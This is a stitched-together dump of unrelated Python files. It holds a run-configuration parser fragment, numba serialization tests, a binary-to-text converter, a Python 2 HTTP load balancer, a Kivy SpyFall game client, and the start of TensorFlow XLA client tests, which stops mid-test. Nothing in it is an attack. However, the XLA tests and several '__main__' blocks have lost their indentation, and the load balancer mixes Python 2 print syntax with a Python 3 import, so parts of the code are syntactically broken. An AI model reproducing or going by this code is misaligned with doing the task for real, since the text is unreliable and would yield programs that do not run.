                    clsmembers = getmembers(mod, islocalrun)
                    run_cls = None
                    for cls in clsmembers:
                        if cls[0] == parts[0].rsplit('.', 1)[1]:
                            run_cls = cls[1]
                            break
                    if not run_cls:
                        raise ValueError('Found no matching class: %s' % parts[0].rsplit('.', 1)[1])
                else:
                    islocalrun = partial(isrun, module=parts[0])
                    clsmembers = getmembers(mod, islocalrun)
                    if len(clsmembers) > 1:
                        raise ValueError('Found more than one matching class.')
                    elif not len(clsmembers):
                        raise ValueError('Found no matching class.')
                    run_cls = clsmembers[0][1]
                # bugfix: run_cls is itself a class, so look up its own
                # __name__; the original used run_cls.__class__.__name__,
                # which is the metaclass name and never matches the conf key.
                if run_cls.__name__ in self._conf:
                    run_conf = self._conf[run_cls.__name__]
                else:
                    run_conf = {}
                # Scan parameters on the line override/extend the run conf.
                for param in parts[1:]:
                    key, value = re.split(r'\s*[=:]\s*', param, 1)
                    run_conf[key] = literal_eval(value)
                run_list.append(run_cls(conf=self._conf, run_conf=run_conf))
            return run_list
    else:
        # bugfix: the exception was instantiated but never raised, silently
        # returning None for unsupported input.
        raise AttributeError('Primlist format not supported.')
def _signal_handler(self, signum, frame):
    """Handle the first Ctrl-C by cancelling the current run.

    The default SIGINT handler is restored first, so a second Ctrl-C
    kills the application outright.
    """
    signal.signal(signal.SIGINT, signal.SIG_DFL)  # setting default handler... pressing Ctrl-C a second time will kill application
    self.cancel_current_run(msg='Pressed Ctrl-C')
def set_event_when_keyboard_interrupt(_lambda):
    '''Decorator factory that sets a Threading.Event() when a keyboard interrupt (Ctrl+C) is raised.

    Parameters
    ----------
    _lambda : function
        Lambda function that maps the bound instance to its Threading.Event() object.

    Returns
    -------
    wrapper : function

    Examples
    --------
    @set_event_when_keyboard_interrupt(lambda x: x.stop_thread_event)
    def scan(self, **kwargs):
        # some code

    Note
    ----
    Decorated functions cannot be derived.
    '''
    def decorate(func):
        @wraps(func)
        def guarded(self, *args, **kwargs):
            try:
                func(self, *args, **kwargs)
            except KeyboardInterrupt:
                # Swallow the interrupt and flag the instance's stop event.
                _lambda(self).set()
        return guarded
    return decorate
if __name__ == "__main__":
pass
# ==== test_serialize.py ====
import contextlib
import gc
import pickle
import runpy
import subprocess
import sys
import unittest
from multiprocessing import get_context
import numba
from numba.core.errors import TypingError
from numba.tests.support import TestCase
from numba.core.target_extension import resolve_dispatcher_from_str
from numba.cloudpickle import dumps, loads
from .serialize_usecases import *
class TestDispatcherPickling(TestCase):
    """Round-trip numba dispatchers through pickle and verify behavior."""

    def run_with_protocols(self, meth, *args, **kwargs):
        # Exercise the check under every pickle protocol this interpreter supports.
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            meth(proto, *args, **kwargs)

    @contextlib.contextmanager
    def simulate_fresh_target(self):
        # Temporarily replace the CPU dispatcher's target descriptor so that
        # unpickling cannot reuse state from the original target.
        hwstr = 'cpu'
        dispatcher_cls = resolve_dispatcher_from_str(hwstr)
        old_descr = dispatcher_cls.targetdescr
        # Simulate fresh targetdescr
        dispatcher_cls.targetdescr = type(dispatcher_cls.targetdescr)(hwstr)
        try:
            yield
        finally:
            # Be sure to reinstantiate old descriptor, otherwise other
            # objects may be out of sync.
            dispatcher_cls.targetdescr = old_descr

    def check_call(self, proto, func, expected_result, args):
        # expected_result may be an exception type the call should raise,
        # or a concrete value the call should return.
        def check_result(func):
            if (isinstance(expected_result, type)
                    and issubclass(expected_result, Exception)):
                self.assertRaises(expected_result, func, *args)
            else:
                self.assertPreciseEqual(func(*args), expected_result)

        # Control
        check_result(func)
        pickled = pickle.dumps(func, proto)
        with self.simulate_fresh_target():
            new_func = pickle.loads(pickled)
            check_result(new_func)

    def test_call_with_sig(self):
        self.run_with_protocols(self.check_call, add_with_sig, 5, (1, 4))
        # Compilation has been disabled => float inputs will be coerced to int
        self.run_with_protocols(self.check_call, add_with_sig, 5, (1.2, 4.2))

    def test_call_without_sig(self):
        self.run_with_protocols(self.check_call, add_without_sig, 5, (1, 4))
        self.run_with_protocols(self.check_call, add_without_sig, 5.5, (1.2, 4.3))
        # Object mode is enabled
        self.run_with_protocols(self.check_call, add_without_sig, "abc", ("a", "bc"))

    def test_call_nopython(self):
        self.run_with_protocols(self.check_call, add_nopython, 5.5, (1.2, 4.3))
        # Object mode is disabled
        self.run_with_protocols(self.check_call, add_nopython, TypingError, (object(), object()))

    def test_call_nopython_fail(self):
        # Compilation fails
        self.run_with_protocols(self.check_call, add_nopython_fail, TypingError, (1, 2))

    def test_call_objmode_with_global(self):
        self.run_with_protocols(self.check_call, get_global_objmode, 7.5, (2.5,))

    def test_call_closure(self):
        inner = closure(1)
        self.run_with_protocols(self.check_call, inner, 6, (2, 3))

    def check_call_closure_with_globals(self, **jit_args):
        inner = closure_with_globals(3.0, **jit_args)
        self.run_with_protocols(self.check_call, inner, 7.0, (4.0,))

    def test_call_closure_with_globals_nopython(self):
        self.check_call_closure_with_globals(nopython=True)

    def test_call_closure_with_globals_objmode(self):
        self.check_call_closure_with_globals(forceobj=True)

    def test_call_closure_calling_other_function(self):
        inner = closure_calling_other_function(3.0)
        self.run_with_protocols(self.check_call, inner, 11.0, (4.0, 6.0))

    def test_call_closure_calling_other_closure(self):
        inner = closure_calling_other_closure(3.0)
        self.run_with_protocols(self.check_call, inner, 8.0, (4.0,))

    def test_call_dyn_func(self):
        # Check serializing a dynamically-created function
        self.run_with_protocols(self.check_call, dyn_func, 36, (6,))

    def test_call_dyn_func_objmode(self):
        # Same with an object mode function
        self.run_with_protocols(self.check_call, dyn_func_objmode, 36, (6,))

    def test_renamed_module(self):
        # Issue #1559: using a renamed module (e.g. `import numpy as np`)
        # should not fail serializing
        expected = get_renamed_module(0.0)
        self.run_with_protocols(self.check_call, get_renamed_module,
                                expected, (0.0,))

    def test_call_generated(self):
        self.run_with_protocols(self.check_call, generated_add,
                                46, (1, 2))
        self.run_with_protocols(self.check_call, generated_add,
                                1j + 7, (1j, 2))

    def test_other_process(self):
        """
        Check that reconstructing doesn't depend on resources already
        instantiated in the original process.
        """
        func = closure_calling_other_closure(3.0)
        pickled = pickle.dumps(func)
        code = """if 1:
            import pickle
            data = {pickled!r}
            func = pickle.loads(data)
            res = func(4.0)
            assert res == 8.0, res
            """.format(**locals())
        subprocess.check_call([sys.executable, "-c", code])

    def test_reuse(self):
        """
        Check that deserializing the same function multiple times re-uses
        the same dispatcher object.

        Note that "same function" is intentionally under-specified.
        """
        func = closure(5)
        pickled = pickle.dumps(func)
        func2 = closure(6)
        pickled2 = pickle.dumps(func2)
        f = pickle.loads(pickled)
        g = pickle.loads(pickled)
        h = pickle.loads(pickled2)
        # Same payload => identical dispatcher object.
        self.assertIs(f, g)
        self.assertEqual(f(2, 3), 10)
        g.disable_compile()
        self.assertEqual(g(2, 4), 11)
        # Different closure => distinct dispatcher.
        self.assertIsNot(f, h)
        self.assertEqual(h(2, 3), 11)
        # Now make sure the original object doesn't exist when deserializing
        func = closure(7)
        func(42, 43)
        pickled = pickle.dumps(func)
        del func
        gc.collect()
        f = pickle.loads(pickled)
        g = pickle.loads(pickled)
        self.assertIs(f, g)
        self.assertEqual(f(2, 3), 12)
        g.disable_compile()
        self.assertEqual(g(2, 4), 13)

    def test_imp_deprecation(self):
        """
        The imp module was deprecated in v3.4 in favour of importlib
        """
        code = """if 1:
            import pickle
            import warnings
            with warnings.catch_warnings(record=True) as w:
                warnings.simplefilter('always', DeprecationWarning)
                from numba import njit
                @njit
                def foo(x):
                    return x + 1
                foo(1)
                serialized_foo = pickle.dumps(foo)
            for x in w:
                if 'serialize.py' in x.filename:
                    assert "the imp module is deprecated" not in x.msg
            """
        subprocess.check_call([sys.executable, "-c", code])
class TestSerializationMisc(TestCase):
    """Miscellaneous serialization behavior not tied to dispatchers."""

    def test_numba_unpickle(self):
        # Test that _numba_unpickle is memorizing its output
        from numba.core.serialize import _numba_unpickle

        random_obj = object()
        bytebuf = pickle.dumps(random_obj)
        hashed = hash(random_obj)

        got1 = _numba_unpickle(id(random_obj), bytebuf, hashed)
        # not the original object
        self.assertIsNot(got1, random_obj)
        got2 = _numba_unpickle(id(random_obj), bytebuf, hashed)
        # unpickled results are the same objects
        self.assertIs(got1, got2)
class TestCloudPickleIssues(TestCase):
    """This test case includes issues specific to the cloudpickle implementation.
    """

    # NOTE(review): presumably opts this case out of numba's parallel test
    # runner because the tests spawn their own processes — confirm.
    _numba_parallel_test_ = False

    def test_dynamic_class_reset_on_unpickle(self):
        # a dynamic class
        class Klass:
            classvar = None

        def mutator():
            Klass.classvar = 100

        def check():
            self.assertEqual(Klass.classvar, 100)

        saved = dumps(Klass)
        mutator()
        check()
        loads(saved)
        # Without the patch, each `loads(saved)` will reset `Klass.classvar`
        check()
        loads(saved)
        check()

    @unittest.skipIf(__name__ == "__main__",
                     "Test cannot run as when module is __main__")
    def test_main_class_reset_on_unpickle(self):
        # Run the check in a fresh spawned process; the helper asserts there
        # and the exit code carries the verdict back.
        mp = get_context('spawn')
        proc = mp.Process(target=check_main_class_reset_on_unpickle)
        proc.start()
        proc.join(timeout=60)
        self.assertEqual(proc.exitcode, 0)

    def test_dynamic_class_reset_on_unpickle_new_proc(self):
        # a dynamic class
        class Klass:
            classvar = None

        # serialize Klass in this process
        saved = dumps(Klass)

        # Check the reset problem in a new process
        mp = get_context('spawn')
        proc = mp.Process(target=check_unpickle_dyn_class_new_proc, args=(saved,))
        proc.start()
        proc.join(timeout=60)
        self.assertEqual(proc.exitcode, 0)

    def test_dynamic_class_issue_7356(self):
        # objmode reads/writes of a module-level class attribute must agree.
        cfunc = numba.njit(issue_7356)
        self.assertEqual(cfunc(), (100, 100))
class DynClass(object):
    """Module-level class mutated from objmode blocks in issue_7356."""
    # For testing issue #7356
    a = None
def issue_7356():
    # Set DynClass.a inside one objmode block and read it back from a second
    # block; both observations should see the mutated value (100, 100).
    with numba.objmode(before="intp"):
        DynClass.a = 100
        before = DynClass.a
    with numba.objmode(after="intp"):
        after = DynClass.a
    return before, after
def check_main_class_reset_on_unpickle():
    """Helper executed in a spawned process: pickle a class defined in a
    module run as ``__main__`` and verify later loads do not reset it."""
    # Load module and get its global dictionary
    glbs = runpy.run_module(
        "numba.tests.cloudpickle_main_class",
        run_name="__main__",
    )
    # Get the Klass and check it is from __main__
    Klass = glbs['Klass']
    assert Klass.__module__ == "__main__"
    assert Klass.classvar != 100
    saved = dumps(Klass)
    # mutate
    Klass.classvar = 100
    # check
    _check_dyn_class(Klass, saved)
def check_unpickle_dyn_class_new_proc(saved):
    """Helper executed in a spawned process: unpickle a dynamic class and
    verify repeated loads reuse it without resetting mutated state."""
    Klass = loads(saved)
    assert Klass.classvar != 100
    # mutate
    Klass.classvar = 100
    # check
    _check_dyn_class(Klass, saved)
def _check_dyn_class(Klass, saved):
    """Deserialize *saved* twice; each load must return *Klass* itself and
    must not reset its mutated ``classvar``."""
    def ensure_mutated():
        if Klass.classvar != 100:
            raise AssertionError("Check failed. Klass reset.")

    ensure_mutated()
    for _ in range(2):
        # Without the patch, each `loads(saved)` will reset `Klass.classvar`
        if loads(saved) is not Klass:
            raise AssertionError("Expected reuse")
        ensure_mutated()
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
# ==== bintotxt.py ====
import os
import numpy as np
import sys
from multiprocessing import Process
import time
import subprocess
def bin2float(file, dtype):
    """Dump a raw binary file to ``<file>.txt``, one value per line (%.6f).

    Parameters
    ----------
    file : str
        Path to the input file; silently ignored unless it ends with ".bin".
    dtype : str
        One of "fp32", "fp16", "int32", "int8".

    Returns
    -------
    0 if *dtype* is not recognised; otherwise None.
    """
    # Dispatch table replaces the original if/elif chain.
    dtype_map = {
        "fp32": np.float32,
        "fp16": np.float16,
        "int32": np.int32,
        "int8": np.int8,
    }
    # Guard clauses: non-.bin inputs are skipped, unknown dtypes rejected
    # (return 0 kept for backward compatibility with existing callers).
    if not file.endswith(".bin"):
        return
    if dtype not in dtype_map:
        print("Input dtype error!")
        return 0
    data = np.fromfile(file, dtype=dtype_map[dtype])
    float_file = file + ".txt"
    print("save the file: " + float_file)
    # One value per row so the text file is a simple column of numbers.
    np.savetxt(float_file, data.reshape(-1, 1), fmt='%.6f')
def bintofloat(filename, dtype):
    """Convert one ``.bin`` file, or every entry of a directory, to text.

    Parameters
    ----------
    filename : str
        A single file path, or a directory whose entries are each converted
        in a separate process.
    dtype : str
        Forwarded to :func:`bin2float` ("fp32", "fp16", "int32", "int8").
    """
    if os.path.isdir(filename):
        workers = []
        for entry in os.listdir(filename):
            # (os.listdir never yields '.'/'..'; check kept from original.)
            if entry != "." and entry != "..":
                # bugfix: build the child path with os.path.join — the
                # original `filename+file` produced broken paths whenever
                # the directory argument lacked a trailing separator.
                target = os.path.join(filename, entry)
                proc = Process(target=bin2float, args=(target, dtype))
                proc.start()
                workers.append(proc)
        # Wait for all converters so no work is lost if the caller exits.
        for proc in workers:
            proc.join()
    else:
        bin2float(filename, dtype)
if __name__ == "__main__":
subprocess.run("ulimit -n 65535",shell=True,cwd="./")
print("params: " + sys.argv[1] + "," + sys.argv[2])
bintofloat(sys.argv[1],sys.argv[2])
# ==== childserver.py ====
import socket
from http.server import *
import sys
import urllib
import threading
import time
# Simple HTTP load balancer (Python 2): listens on port 1080 and forwards
# each request to one of the parent servers below.
routingsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
routingsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1);
routingsocket.bind(('', 1080))
routingsocket.listen(1000000000)

number_of_servers = 3
counter = 0  # index of the parent server that receives the next request
page = " "
method = 1  # default round robin
weights = [2, 4, 5]  # per-server request quota for weighted round robin
temp_weight = weights[0]  # requests left for the current server (method 2)
parent_servers = [("192.168.43.119", 8081), ('192.168.43.119', 8082), ('192.168.43.119', 8080)]

print "Tag --clear-log to clear the log file"
print "Add method tag: e.g. --method=1"
print "1. Round robin"
print "2. Weighted round robin"

# --clear-log truncates the request log before serving.
if len(sys.argv) >= 2 and "--clear-log" in sys.argv[1]:
    fp = open("requests.log", "w")
    fp.close()
# --method=N may appear as the first or second argument.
if len(sys.argv) >= 2 and ("--method" in sys.argv[1]):
    type_m = sys.argv[1]
    method = int(type_m.split("=")[1])
elif len(sys.argv) >= 3 and ("--method" in sys.argv[2]):
    type_m = sys.argv[2]
    method = int(type_m.split("=")[1])
assert(method <= 2)
def process_request(client_socket, client_address):
    """Forward one client request to the next parent server and relay the
    reply back, logging the request line with a timestamp.

    Parent selection uses the module-level `counter`, advanced according to
    `method` (1 = round robin, 2 = weighted round robin).
    """
    global counter
    global temp_weight
    global weights
    request = client_socket.recv(1000000000)
    print("Request received from client")
    print request
    # Append "<timestamp> <client ip> <request line>" to the log file.
    timestamp = time.strftime("%d %b %Y %H:%M:%S ", time.localtime())
    fp = open("requests.log", "a+")
    fp.write(timestamp +" "+ str(client_address[0]) +" "+ request.split("\n")[0] + "\n")
    fp.close()
    parentsocket = socket.socket()
    parentsocket.connect(parent_servers[counter])
    # NOTE(review): counter/temp_weight are shared module state mutated
    # without a lock; concurrent handler threads could race here — confirm.
    if method == 1:
        counter = (counter + 1)%number_of_servers
    elif method == 2:
        # Weighted: stay on the same parent until its quota is exhausted.
        temp_weight -= 1
        if temp_weight == 0:
            counter = (counter + 1)%number_of_servers
            temp_weight = weights[counter]
    parentsocket.send(request)
    print "Receiving from parent"
    # Relay the parent's response chunk by chunk until it closes the stream.
    while True:
        page = parentsocket.recv(1000000000)
        client_socket.send(page)
        if not page:
            break
    print "File received"
    print page
    client_socket.close()
    parentsocket.close()
# Accept loop: spawn a thread per connection.
# NOTE(review): join() immediately after start() blocks the accept loop until
# the handler finishes, so requests are effectively served one at a time —
# confirm whether serial handling was intended.
while True:
    client_socket, client_address = routingsocket.accept()
    request_thread = threading.Thread(target = process_request, args = (client_socket, client_address))
    request_thread.start()
    request_thread.join()
# Unreachable: the loop above never exits normally.
routingsocket.close()
# ==== main.py ====
from kivy.config import Config
# Window size must be configured before kivy.core.window is imported.
MAX_SIZE = (500, 1050)  # window width/height in pixels
Config.set('graphics', 'width', MAX_SIZE[0])
Config.set('graphics', 'height', MAX_SIZE[1])
from kivy.core.window import Window
import kivy
import Global
import client
import time
import threading
import time
from kivy import *
from kivy.app import App
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.uix.gridlayout import GridLayout
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivymd.theming import ThemeManager
from kivy.uix.button import Button
from kivymd.app import MDApp
from kivy.core.audio import SoundLoader
from kivy.uix.widget import Widget

# Start the background music and create the shared screen manager used by
# every screen class below.
Global.background_music.play()
sm = ScreenManager()
Playground_Screen = kivy.properties.ObjectProperty(None)
class MainScreen(Screen):
    """Landing screen; clears the finished playground when re-entered."""

    def on_enter(self):
        # After a game ends, the stale playground screen must be removed
        # before a new one can be registered.
        if Global.isFirstGame == 'true':
            sm.remove_widget(sm.get_screen('playground'))
            Global.isFirstGame = 'false'

    def isAdmin_change(self, flag):
        # Remember whether this player is the lobby creator.
        Global.isAdmin = flag

    def push_button_sound(self):
        Global.button_sound.play()
class OptionsScreen(Screen):
    """Settings screen: music and button-sound volume sliders."""

    def push_button_sound(self):
        Global.button_sound.play()

    def change_music_volume(self, value):
        # Slider delivers 0..10; the audio API expects 0..1.
        Global.background_music.volume = value / 10

    def change_sound_of_push_volume(self, value):
        Global.button_sound.volume = value / 10
class CreateLobbyScreen(Screen):
    """Lobby creation: choose player/spy counts and fetch a join token."""

    playground_screen = 0
    label_spyamount = kivy.properties.ObjectProperty(None)

    def push_button_sound(self):
        Global.button_sound.play()

    def appear_token(self):
        # Ask the server for a new lobby, display the returned token and
        # unlock the play button; the playground screen is created now so
        # it is ready when the game starts.
        Global.data = client.createLobby(Global.players_amount, Global.spy_amount)
        Global.token = Global.data[0]
        token_button = self.token_layout.token_button
        token_button.font_size = 60
        token_button.texture_update()
        token_button.text = Global.token
        self.play_button_layout.play_button.disabled = False
        sm.add_widget(PlaygroundScreen(name='playground'))

    def add_spy(self):
        # Wrap around: incrementing past the maximum (4) restarts at 1.
        if Global.spy_amount == 4:
            Global.spy_amount = 0
        Global.spy_amount += 1
        self.ids.lbl_spy.text = str(Global.spy_amount)
        print(Global.spy_amount)

    def delete_spy(self):
        # Floor at 0: decrementing from 0 stays at 0 (0 is bumped to 1 first).
        if Global.spy_amount == 0:
            Global.spy_amount = 1
        Global.spy_amount -= 1
        self.ids.lbl_spy.text = str(Global.spy_amount)
        print(Global.spy_amount)

    def my_value(self, value):
        Global.players_amount = value
class ConnectScreen(Screen):
    """Join an existing lobby by entering its token."""

    token_code = kivy.properties.StringProperty('')

    def push_button_sound(self):
        Global.button_sound.play()

    def enter_game(self, tokdef=''):
        self.token_code = tokdef
        # Guard clause: an empty token means nothing to do.
        if self.token_code == '':
            return
        Global.data = client.connect(self.get_token())
        Global.token = self.get_token()
        if Global.data == 'invalid token':
            # Tell the user the token was rejected.
            body = GridLayout(cols = 1, padding = 15, spacing = 15)
            body.add_widget(Label(text = 'Invalid Token.\nTry Again'))
            popup = Popup(title ='Error',
                          content = body,
                          size_hint =(None, None), size =(200, 100))
            popup.open()
        else:
            # Token accepted: create and switch to the playground screen.
            sm.add_widget(PlaygroundScreen(name = 'playground'))
            sm.current = 'playground'

    def get_token(self):
        # Tokens are compared case-insensitively server-side.
        return self.token_code.upper()
class PlaygroundScreen(Screen):
    """In-game screen: shows the 4x4 location grid and polls game status."""

    # State populated from Global.data when the screen is entered.
    locations = []     # candidate location names shown on the grid
    role = ''          # this player's role ('spy' or 'peaceful')
    key_location = ''  # the secret location for this round
    scrn = ''

    def push_button_sound(self):
        Global.button_sound.play()

    def enter_screen(self):
        # The server reply is indexed differently for admins: their payload
        # carries one extra leading element, shifting every field by one.
        if(Global.isAdmin == False):
            self.role = Global.data[0]
            self.key_location = Global.data[1]
            self.locations = Global.data[2]
        else:
            self.role = Global.data[1]
            self.key_location = Global.data[2]
            self.locations = Global.data[3]
        # Build the 4x4 grid of location buttons.
        for i in range(16):
            my_button = Button(text=self.locations[i], on_press=self.location_press, background_normal = 'Playground Menu/empty_location_logo.png', background_down = 'Playground Menu/empty_location_logo.png')
            self.grid.add_widget(my_button)
        print(self.key_location)

    def game_process(self):
        # Poll game status on a daemon thread so the UI stays responsive.
        gameCheck_status = threading.Thread(target=self.gameOver_update, daemon=True)
        gameCheck_status.start()

    def gameOver_update(self):
        # Poll once per second while the flag reads 'true'; when the server
        # reports a different status, reset the flag and show the popup.
        while(Global.gameOver == 'true'):
            Global.gameOver = client.checkGameStatus(Global.token)
            time.sleep(1)
        Global.gameOver = 'true'
        self.gameOver_popup()

    def location_press(self, instance):
        # Only the spy submits location guesses to the server.
        if(self.role == 'spy'):
            client.checkLocation(Global.token, instance.text)

    def gameOver_popup(self):
        layout = GridLayout(cols = 1, padding = 10)
        label_gameOver = Label(text = 'Game Over')
        layout.add_widget(label_gameOver)
        popup = Popup(title ='Congratz',
                      content = layout,
                      size_hint =(None, None), size =(250, 200))
        # Dismissing the popup returns the player to the main menu.
        popup.bind(on_dismiss=self.goto_Main)
        popup.open()

    def goto_Main(self, instance):
        Global.isFirstGame = 'true'
        sm.current = 'main'

    def rolePopup(self):
        # Show this player's role (plus the secret location for non-spies),
        # then start the background status polling.
        layout = GridLayout(cols = 2, padding = 10)
        label__role_text = Label(text = 'Role: ')
        label_role = Label(text = self.role.upper())
        label__location_text = Label(text = 'Location: ')
        label__location = Label(text = self.key_location.upper())
        layout.add_widget(label__role_text)
        layout.add_widget(label_role)
        if(self.role == 'peaceful'):
            layout.add_widget(label__location_text)
            layout.add_widget(label__location)
        popup = Popup(title ='Role',
                      content = layout,
                      size_hint =(None, None), size =(350, 300))
        popup.open()
        self.game_process()
class SpyFallApp(MDApp):
    """Application entry point: configures the theme and registers screens."""

    def __init__(self, **kwargs):
        self.title = 'SpyFall'
        # Theme attributes are set before MDApp.__init__ runs.
        self.theme_cls.theme_style = 'Dark'
        self.theme_cls.primary_palette = 'BlueGray'
        super().__init__(**kwargs)

    def build(self):
        # The 'playground' screen is added later, once a lobby exists.
        sm.add_widget(MainScreen(name='main'))
        sm.add_widget(OptionsScreen(name='options'))
        sm.add_widget(CreateLobbyScreen(name='createlobby'))
        sm.add_widget(ConnectScreen(name='connect'))
        return sm
# Launch the kivy application when run as a script.
if __name__ == '__main__':
    SpyFallApp().run()
# ==== xla_client_test.py ====
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl import logging
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
    # This import is only used for GPU; the dependency is incompatible with TPU
    # so it results in an import error.
    from tensorflow.python.framework import test_util
except ImportError:
    test_util = None

# pylint: disable=g-import-not-at-top
try:
    from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
    # Custom-call tests are skipped when this helper extension is missing.
    custom_call_for_test = None

# Convenience aliases into the xla_client extension module.
bfloat16 = xla_client.bfloat16
ops = xla_client.ops

FLAGS = flags.FLAGS

# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend, cloud_tpu=False, tfrt_tpu=False,
external_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes + [np.bool_]
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleAsSerializedProto(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
proto = hlo_modules[0].as_serialized_hlo_module_proto()
hlo_module_roundtrip = xla_client.XlaComputation(proto).get_hlo_module()
hlo_text_roundtrip = hlo_module_roundtrip.to_string()
self.assertEqual(hlo_text, hlo_text_roundtrip)
@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
def testFingerprint(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
fingerprint = executable.fingerprint
if self.backend.platform == "tpu" and not cloud_tpu:
logging.info("fingerprint: %s", fingerprint)
self.assertNotEmpty(fingerprint)
else:
self.assertIsNone(fingerprint)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
c = self._NewComputation()
